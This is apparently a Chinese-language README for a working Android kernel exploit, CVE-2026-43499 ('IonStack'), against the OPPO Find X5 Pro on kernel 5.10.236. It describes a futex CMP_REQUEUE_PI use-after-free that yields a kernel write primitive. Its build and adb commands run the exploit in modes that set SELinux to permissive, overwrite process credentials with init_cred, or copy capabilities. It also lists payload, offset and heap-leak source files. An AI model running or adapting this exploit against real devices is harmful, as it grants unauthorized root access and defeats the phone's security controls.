CVE-2026-43499 (IonStack) 针对 OPPO Find X5 Pro (PFEM10) 的漏洞利用。
内核 5.10.236-android12-9-o,futex CMP_REQUEUE_PI UAF → pi-tree 写入原语。
使用风险自负。预期会出现内核崩溃/重启。请勿更新固件。
./build.sh # 需要 Android NDK r28c
构建参数已固定(-O1 / android26)——更改它们会破坏栈几何校准。
adb push exploit /data/local/tmp/
adb shell /data/local/tmp/exploit W1 # SELinux 宽容模式
adb shell /data/local/tmp/exploit W2 # 子进程凭据 -> init_cred
adb shell /data/local/tmp/exploit W5 # 仅 caps 凭据复制
跨重启重试:bash run.sh <模式> [尝试次数]
src/ 漏洞利用 + 载荷 + 偏移量(exploit.c、payload.c、pfem10_target.h)
lib/ KernelSnitch 堆泄漏库
model/ rtmutex 链遍历模型(主机验证)
oplus_root_check 阻止,仅 caps 路线进行中)CyberMeowfia · IonStack(原始漏洞利用)